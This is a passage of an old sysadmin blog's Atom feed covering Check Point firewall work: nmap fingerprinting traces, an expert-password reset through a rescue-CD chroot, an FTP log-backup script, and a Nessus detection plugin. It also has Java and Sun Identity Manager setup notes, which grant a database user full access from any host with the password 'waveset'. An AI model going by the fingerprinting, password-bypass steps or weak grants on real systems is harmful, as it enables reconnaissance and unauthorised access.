ttl=55 id=44555 iplen=40 seq=1685203678 win=4096&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;RCVD (0.0290s) TCP 192.168.1.200:18264 &amp;gt; 192.168.1.15:58825 SA ttl=64 id=0 iplen=44 seq=876407979 win=5840 ack=1685203679&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Host 192.168.1.200 appears to be up.&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;MAC Address: 00:0C:29:6B:B2:29 (VMware)&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 0.639 seconds&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;root@pazwant:~# nmap -sP&amp;nbsp;&amp;nbsp;-PS&lt;/span&gt;&lt;strong&gt;&lt;span style="font-size:85%;"&gt;264&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size:85%;"&gt;192.168.1.200 --packet_trace&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-05-08 03:54 GMT+2&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;SENT (0.0280s) TCP 192.168.1.15:41434 &amp;gt; 192.168.1.200:264 S ttl=42 id=20575 iplen=40 seq=1024727070 win=3072&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;RCVD (0.0290s) TCP 192.168.1.200:264 &amp;gt; 192.168.1.15:41434 RA ttl=255 id=0 iplen=40 seq=1026828309 win=0 ack=1024727071&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Host 192.168.1.200 appears to be up.&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;MAC Address: 00:0C:29:6B:B2:29 (VMware)&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 0.645 seconds&lt;/span&gt;&lt;br/&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-113286868515928620?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/113286868515928620/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=113286868515928620' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113286868515928620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113286868515928620'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/11/identifying-checkpoint-with-nmap.html' title='Identifying Checkpoint with nmap'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-112782904254057442</id><published>2005-09-27T16:29:00.000+03:00</published><updated>2006-04-24T11:29:49.323+03:00</updated><title type='text'>RSA Authentication API config for Java</title><content type='html'>For independent applications and application server's that RSA did not provide any &lt;br /&gt;agent, we can use Java API for entegration.In this work our platform is&lt;br /&gt;    Ace server 6.0&lt;br /&gt;    Java API 5.0.3&lt;br /&gt;    RedHat Enterprise 3.0&lt;br /&gt;&lt;br /&gt;First off all on Ace Server site, we create an agent host tagged as Unix Agent.After&lt;br /&gt;defining acting master and slave servers get the sdconf.rec to the linux machine.&lt;br /&gt;On linux machine you need to download Java_API tar file and open it on any default directory as you wish..&lt;br /&gt;&lt;br /&gt;In this directory go to the sample directory and compile jar files resides on lib directory..&lt;br /&gt;&lt;br /&gt;[root@redent sample]# pwd&lt;br /&gt;/root/rsa/examples/sample&lt;br /&gt;&lt;br /&gt;[root@redent sample]#javac -classpath ../../lib/authapi.jar:../../lib/log4j-1.2.8.jar *.java io/*.java&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-112782904254057442?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/112782904254057442/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=112782904254057442' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112782904254057442'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112782904254057442'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/09/rsa-authentication-api-config-for-java.html' title='RSA Authentication API config for Java'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-112877053518401453</id><published>2005-09-08T14:06:00.000+03:00</published><updated>2006-04-04T10:20:00.453+03:00</updated><title type='text'>Checkpoint Expert Passwd Reset</title><content type='html'>For resetting user and admin password, we need a Redhat CD for opening&lt;br /&gt;the system at Rescue Mode.The basics of this operation is mounting the&lt;br /&gt;CP harddisk and running CP commands for editing and adding user by&lt;br /&gt;changing the root directory...&lt;br /&gt;&lt;br /&gt;I tested that password reset on Linux Redhat 8.0 , after opening system in rescue mode you have to go down the bash shell by typing &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;~/bin/sh-2.05b#/ bash&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;bash-2.05b#&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;During the rescue operation on CD, the system will be mounted on /mnt/sysimage , so do chroot( changes the root directory to that specified in path ) command&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;bash-2.05b# chroot /mnt/sysimage&lt;/span&gt; &lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;bash# su - &lt;br /&gt;&lt;br /&gt;Now your directory is CP shell on [Expert:localhost.localdomain]# &lt;br /&gt;we can change or add user easily at tihs time..&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;[Expert@localhost.localdomain]# expert_passwd&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;Enter new expert password:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;Enter new expert password again:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;Expert passwd has been changed...&lt;br /&gt;&lt;br /&gt;We can also add or delete any user..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-112877053518401453?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/112877053518401453/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=112877053518401453' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112877053518401453'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112877053518401453'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/09/checkpoint-expert-passwd-reset.html' title='Checkpoint Expert Passwd Reset'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-112526028075396124</id><published>2005-08-28T22:49:00.000+03:00</published><updated>2005-08-28T23:18:00.756+03:00</updated><title type='text'>Log export Script for Checkpoint</title><content type='html'>This script tars the log files and send them to an ftp server .. Before Using This backup script you have to manully set log switch time to midnight and make a cronjob for executing this script after midnight time like 24:01  &lt;br /&gt;&lt;br /&gt;!#/bin/bash&lt;br /&gt;. /opt/CPshrd-R55/tmp/.CPprofile.sh (For NGX version this path /opt/CPshrd-R60/tmp/.CPprofile.sh)&lt;br /&gt;DATE=`date +%Y-%m-%d`&lt;br /&gt;LOGS=$FWDIR/log&lt;br /&gt;LOGFILE=$LOGS/”$DATE”_235900.log&lt;br /&gt;tar cvf—absolutenames $LOGFILE.tar.gz “$LOGFILE” 2&gt; /dev/null&lt;br /&gt;ZIP=$DATE”_235900.log.tar.gz”&lt;br /&gt;ftp_put ()&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;FTPIP=”xxx.xxx.xxx.xxx”&lt;br /&gt;DIR=”xxx.xxx.xxx”&lt;br /&gt;USER=”xxx”&lt;br /&gt;PASS=”xxx”&lt;br /&gt;ftp -n $FTPIP &lt; &lt; EOF&lt;br /&gt;user $USER $PASS&lt;br /&gt;bin&lt;br /&gt;cd $DIR&lt;br /&gt;lcd /opt/CPfw1-R55/log&lt;br /&gt;put $ZIP&lt;br /&gt;bye&lt;br /&gt;EOF&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;exit 0&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-112526028075396124?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/112526028075396124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=112526028075396124' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112526028075396124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112526028075396124'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/08/log-export-script-for-checkpoint.html' title='Log export Script for Checkpoint'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-112525803871514471</id><published>2005-08-28T22:40:00.000+03:00</published><updated>2005-08-28T23:32:17.623+03:00</updated><title type='text'>Nessus plugin for Checkpoint</title><content type='html'>#&lt;br /&gt;# Body of a script&lt;br /&gt;#&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if (description) &lt;br /&gt;{&lt;br /&gt;   script_id(987654);&lt;br /&gt;   script_version ("$Revision: 1.00 $");&lt;br /&gt;   name["english"] = "Checkpoint Firewall-1 Ica_Services  Detection";&lt;br /&gt;   script_name(english:name["english"]);&lt;br /&gt;   script_description(english:&lt;br /&gt;   "A Firewall-1 Isa_Services running on this port.&lt;br /&gt;  &lt;br /&gt;    An attacker can understand your firewall vendor name&lt;br /&gt;    and the IP addresses of the firewall by scanning this service remotly.&lt;br /&gt;    &lt;br /&gt;    Solution : if you do not use this service, disable it.&lt;br /&gt;    Risk factor : Low");&lt;br /&gt;   summary["english"] = "Checks for the presence of Checkpoint Firewall Ica_Services ";&lt;br /&gt;   script_summary(english:summary["english"]);&lt;br /&gt;   script_category(ACT_GATHER_INFO);&lt;br /&gt;   script_family(english:"Firewalls");&lt;br /&gt;   script_copyright(english:"This script is Copyright (C) 2005 Anil Pazvant ");&lt;br /&gt;   script_dependencie("find_service.nes", "http_version.nasl" , "httpver.nasl");&lt;br /&gt;   script_require_ports("Services/www",18264);&lt;br /&gt;   exit(0);&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;#&lt;br /&gt;# the code&lt;br /&gt;#&lt;br /&gt;include("http_func.inc");&lt;br /&gt;include ("http_keepalive.inc");&lt;br /&gt;&lt;br /&gt;port = get_http_port(default:18264)&lt;br /&gt;&lt;br /&gt;if (!get_port_state(port))exit(0);&lt;br /&gt;req = http_get(item:"/", port:port);&lt;br /&gt;x = http_keepalive_send_recv(port:port, data:req, bodyonly:1);&lt;br /&gt;if (x==NULL)exit(0);&lt;br /&gt;&lt;br /&gt;if (egrep(pattern:"Server: Check Point SVN foundation", string:x))&lt;br /&gt;{&lt;br /&gt;  security_hole(port);&lt;br /&gt;  }&lt;br /&gt;  exit(0);&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-112525803871514471?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/112525803871514471/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=112525803871514471' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112525803871514471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112525803871514471'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/08/nessus-plugin-for-checkpoint.html' title='Nessus plugin for Checkpoint'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-112712829769962686</id><published>2005-08-19T14:04:00.000+03:00</published><updated>2006-06-29T15:05:05.896+03:00</updated><title type='text'>Sun Identity Manager 5.0 Installation on  Linux</title><content type='html'>During the installation , here is the list of packages i used :&lt;br /&gt;&lt;br /&gt;• jdk-1_5_0_02-linux-i586.bin&lt;br /&gt;• jakarta-tomcat-4.1.31&lt;br /&gt;• mysql 4.1.x&lt;br /&gt;• Sun IDM 5.0&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;INSTALLING JDK&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[root@IDM java]#  chmod +x  jdk-1_5_0_02-linux.i586.bin&lt;br /&gt;[root@IDM java]# ./ jdk-1_5_0_02-linux.i586.bin &lt;br /&gt;&lt;br /&gt;The considerable point in JDK installations are setting the PATH ENVIRONMENT; after the installation of source jdk, refer the following:&lt;br /&gt;&lt;br /&gt;Give a basic symbolic link to the jdk1.5.0_02 directory.&lt;br /&gt;&lt;br /&gt;[root@IDM java]#  ln –sf jdk1.5.0_02  jdk&lt;br /&gt;  &lt;br /&gt;Edit the /etc/profile file and register the following variables, for testing the path you have to logout/in  the system for once.&lt;br /&gt;                    export JAVA_HOME=/usr/java/jdk&lt;br /&gt;                    PATH=$PATH:/usr/java/jdk/bin&lt;br /&gt;&lt;br /&gt;[root@IDM java]# echo $JAVA_HOME&lt;br /&gt;    /usr/java/jdk&lt;br /&gt;[root@IDM java]# java -version&lt;br /&gt;    java version "1.5.0_02"&lt;br /&gt;    Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_02-b09)&lt;br /&gt;    Java HotSpot(TM) Client VM (build 1.5.0_02-b09, mixed mode, sharing)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;INSTALLING TOMCAT APPLICATION SERVER&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;After completing JDK installation , we can install Tomcat Application Server&lt;br /&gt;&lt;br /&gt;[root@IDM /]# tar zxvf jakarta-tomcat-4.1.31 -C /usr/local&lt;br /&gt;[root@IDM /]# ln –sf  /usr/local/jakarta-tomcat-4.1.31 /usr/local/tomcat&lt;br /&gt;&lt;br /&gt;Edit the /etc/profile file and register the following variables, for testing the path you have to logout/in  the system for once.&lt;br /&gt;                        export CATALINA_HOME=/usr/local/tomcat&lt;br /&gt;&lt;br /&gt;For Starting Tomcat  run  /usr/local/tomcat/bin/startup.sh&lt;br /&gt;     Let’s check tomcat is running ;&lt;br /&gt;&lt;br /&gt; [root@IDM bin]# lsof -iTCP:8080&lt;br /&gt;   COMMAND  PID  USER   FD  TYPE  DEVICE SIZE  NODE  NAME&lt;br /&gt;            Java   1126  root     5u  IPv4       3301       TCP  *:webcache (LISTEN)&lt;br /&gt;&lt;br /&gt;For Stopping Tomcat run /usr/local/tomcat/bin/shutdown.sh &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;INSTALLING MYSQL DATABASE SERVER&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The recomended MySql version for IDM is 4.0.16, however i try to install the latest 4.1.x version and messed up.During the installation of IDM i had to change create_waveset_tables.mysql script&lt;br /&gt;&lt;br /&gt;[root@IDM root]# tar zxvf mysql-4.1.10a.tar.gz&lt;br /&gt;[root@IDM root]# cd mysql-4.1.10a&lt;br /&gt;[root@IDM root]#  useradd mysql -s /sbnin/nologin&lt;br /&gt;&lt;br /&gt; Configure MySQL&lt;br /&gt;&lt;br /&gt;[root@IDM root]# CFLAGS="-O3 -mcpu=i686"&lt;br /&gt;[root@IDM root]# CXX=gcc&lt;br /&gt;[root@IDM root]#  CXXFLAGS="-O3 -mcpu=i686 -felide-constructors -fno-exceptions -fno-rtti"&lt;br /&gt;   &lt;br /&gt;  [root@IDM root]#  ./configure         --prefix=/usr/local/mysql         --with-mysqld-ldflags=-all-static         --with-extra-charsets=complex&lt;br /&gt; &lt;br /&gt;After configuring mysql let’s compile ;  &lt;br /&gt;  &lt;br /&gt;[root@IDM root]#  make ( A long time period )&lt;br /&gt;[root@IDM root]#  make install&lt;br /&gt;&lt;br /&gt;[root@IDM root]# scripts/mysql_install_db&lt;br /&gt;[root@IDM root]#  chown -R root  /usr/local/mysql&lt;br /&gt;[root@IDM root]#  chown -R mysql /usr/local/mysql/var&lt;br /&gt;[root@IDM root]#  chgrp -R mysql /usr/local/mysql&lt;br /&gt;&lt;br /&gt;        You can change support-files type for your system performance;&lt;br /&gt;  &lt;br /&gt;[root@IDM root]#  cp support-files/my-medium.cnf /etc/my.cnf&lt;br /&gt;  &lt;br /&gt;         Configuring mysql for running in inet superdeamon ;&lt;br /&gt;&lt;br /&gt;[root@IDM root]#  cp support-files/mysql.server /etc/init.d/                  &lt;br /&gt;[root@IDM root]# chmod +x /etc/init.d/mysql.server&lt;br /&gt;[root@IDM root]#  cd /etc/rc3.d&lt;br /&gt;[root@IDM root]#  ln -s ../init.d/mysql.server S99mysql&lt;br /&gt;[root@IDM root]#  cd /etc/rc5.d&lt;br /&gt;[root@IDM root]#  ln -s ../init.d/mysql.server S99mysql&lt;br /&gt;[root@IDM root]#  cd /etc/rc0.d&lt;br /&gt;[root@IDM root]#  ln -s ../init.d/mysql.server K04mysql&lt;br /&gt;&lt;br /&gt;   After finishing above ; let’s start mysql and connect ..&lt;br /&gt;&lt;br /&gt;[root@IDM init.d]# ./mysql.server start&lt;br /&gt;[root@IDM init.d]# lsof -iTCP:3306&lt;br /&gt;&lt;br /&gt;COMMAND  PID  USER   FD   TYPE DEVICE SIZE NODE NAME&lt;br /&gt;mysqld  1270 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1271 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1272 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1273 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1274 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1275 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt;mysqld  1276 mysql    3u  IPv4  21329       TCP *:mysql (LISTEN)&lt;br /&gt; &lt;br /&gt;INSTALLING IDM_5.0 &lt;br /&gt;&lt;br /&gt;Before installing IDM we have to add a column to create_waveset_tables.mysql about priviledges;&lt;br /&gt;#&lt;br /&gt;# Give permissions to the "waveset" userid logging in from any host.&lt;br /&gt;#&lt;br /&gt;GRANT ALL PRIVILEGES on waveset.* TO waveset IDENTIFIED BY 'waveset';&lt;br /&gt;#&lt;br /&gt;# Give permissions to the "waveset" userid logging in from any host.&lt;br /&gt;# NOTE: This is equivalent to the formulation where host is unspecified,&lt;br /&gt;# which works fine for MySQL on Solaris 2.6 in our lab,&lt;br /&gt;# but one customer (with an odd DNS setup) needed the following variant.&lt;br /&gt;#&lt;br /&gt;GRANT ALL PRIVILEGES on waveset.* TO waveset@'%' IDENTIFIED BY 'waveset';&lt;br /&gt;#&lt;br /&gt;# Give permissions to the "waveset" user when it logs in from the localhost.  &lt;br /&gt;# MySQL on NT or Linux (I forget which) required this for JDBC connections.&lt;br /&gt;#&lt;br /&gt;GRANT ALL PRIVILEGES on waveset.* TO waveset@localhost IDENTIFIED BY 'waveset';&lt;br /&gt;GRANT ALL ON waveset.* TO waveset@"127.0.0.1" IDENTIFIED BY "waveset";&lt;br /&gt;&lt;br /&gt;After adding column , now we can run script &lt;br /&gt;&lt;br /&gt;[root@IDM init.d]# mysql -u root &lt; create_waveset_tables.mysql&lt;br /&gt;&lt;br /&gt;Now open your X Server and start install script as well.During the installation Select Ins Path as&lt;br /&gt;/usr/local/tomcat/webapps/idm, before running “Launch Setup” , download mysqljdbc.jar and put it on “/usr/local/tomcat/webapps/idm4/WEB-INF/lib” directory.&lt;br /&gt;&lt;br /&gt;[root@IDM init.d]# wget -P/usr/local/tomcat/webapps/idm4/WEB-INF/lib =&gt;http://www.cs.armstrong.edu/liang/intro5e/book/mysqljdbc.jar&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-112712829769962686?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112712829769962686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/112712829769962686'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/08/sun-identity-manager-50-installation.html' title='Sun Identity Manager 5.0 Installation on  Linux'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
